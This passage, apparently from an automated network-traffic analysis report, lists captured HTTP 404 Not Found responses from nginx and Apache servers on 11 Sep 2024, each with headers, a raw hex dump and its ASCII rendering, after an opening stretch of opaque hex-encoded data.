6a 50 36 44 4c 6c 34 58 66 58 52 6b 65 4c 58 75 39 59 78 54 55 6e 75 74 6a 61 44 76 6e 44 6b 36 2b 47 75 4f 6c 73 4a 50 31 51 52 43 2b 37 36 6b 66 77 58 68 4e 2f 47 53 7a 38 48 4f 39 42 2b 4c 6b 79 64 30 63 68 73 47 65 72 6a 70 53 58 45 72 74 6a 55 65 42 51 79 46 65 4c 43 4f 34 49 4f 59 2b 37 34 34 53 52 4a 63 6d 6c 6a 64 4d 4c 38 71 6e 53 4c 2b 7a 56 35 75 78 50 48 69 66 4c 51 73 5a 46 65 68 71 70 7a 55 4b 5a 54 68 54 4c 4e 43 4c 41 34 41 4b 55 75 46 45 34 41 4e 2f 4d 54 41 55 55 43 69 61 6e 70 2b 64 4b 32 49 63 62 6d 39 38 64 76 43 5a 55 4d 35 45 4f 32 56 51 76 35 4b 6e 4f 32 43 41 48 34 61 77 49 38 58 4b 57 61 39 59 33 76 50 6d 6d 39 71 38 76 7a 35 33 52 77 6d 62 64 63 57 68 75 32 48 51 48 65 41 33 6e 46 6e 45 55 62 4b 59 7a 61 39 77 43 59 4c 34 4c 65 68 77 70 30 46 6f 71 49 50 6d 69 30 32 42 54 48 58 54 73 4c 49 69 52 46 47 36 67 32 52 43 4b 33 4d 44 47 43 4c 6d 64 46 63 41 71 35 59 62 45 68 2b 4f 71 4a 53 2b 69 4c 71 68 79 6e 73 57 5a 4f 74 70 66 44 6c 31 64 39 62 67 6e 70 4c 63 4f 36 59 79 4e 69 33 4f 33 73 4a 37 46 42 2b 6f 42 55 31 7a 73 6f 41 42 46 46 53 37 63 4a 4e 47 6c 47 66 4d 69 38 62 51 6f 46 34 55 66 30 50 32 4b 38 39 77 5a 6a 63 59 74 35 4f 6e 51 50 66 75 6a 75 65 35 47 75 47 4b 77 58 44 56 55 48 50 44 6b 69 46 6e 5a 59 56 67 78 73 38 64 53 67 50 61 79 53 31 57 69 68 36 42 32 48 35 44 74 78 4b 37 66 73 44 31 76 37 74 42 50 46 70 70 38 65 39 33 6c 32 72 57 70 37 30 36 35 6b 69 65 31 49 34 68 66 4b 61 68 44 50 52 31 64 44 33 49 70 6c 64 30 74 2f 59 71 70 49 47 33 69 50 4f 34 36 56 59 46 6b 53 57 64 38 4e 33 47 39 2b 4d 4c 39 4a 61 32 6a 66 51 70 4e 6b 6b 53 35 79 69 48 37 41 55 2f 53 74 53 51 65 55 72 53 61 4c 4c 67 42 48 57 71 61 4a 55 79 50 75 35 47 32 38 54 68 55 70 79 35 75 67 55 67 68 75 74 48 56 77 49 59 36 6c 42 50 41 74 75 6e 63 2b 6d 4c 68 58 67 5a 66 39 4c 6b 6a 64 52 75 59 36 51 74 31 30 52 6a 74 4d 6d 37 61 4d 33 49 72 64 4f 31 71 49 34 59 6a 53 42 6c 56 4f 49 50 75 4a 34 68 6d 59 76 4c 4d 50 4e 54 47 75 79 58 75 49 4b 34 4d 52 6e 48 31 44 6b 33 2b 2b 53 4d 75 39 7
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:09:08 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:09:19 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:09:21 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:09:24 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:09:27 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:09:50 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:09:52 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:09:55 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:09:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 11 Sep 2024 08:10:11 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-11T08:10:16.6015079Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:10:30 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:10:33 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:10:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:10:38 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:10:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 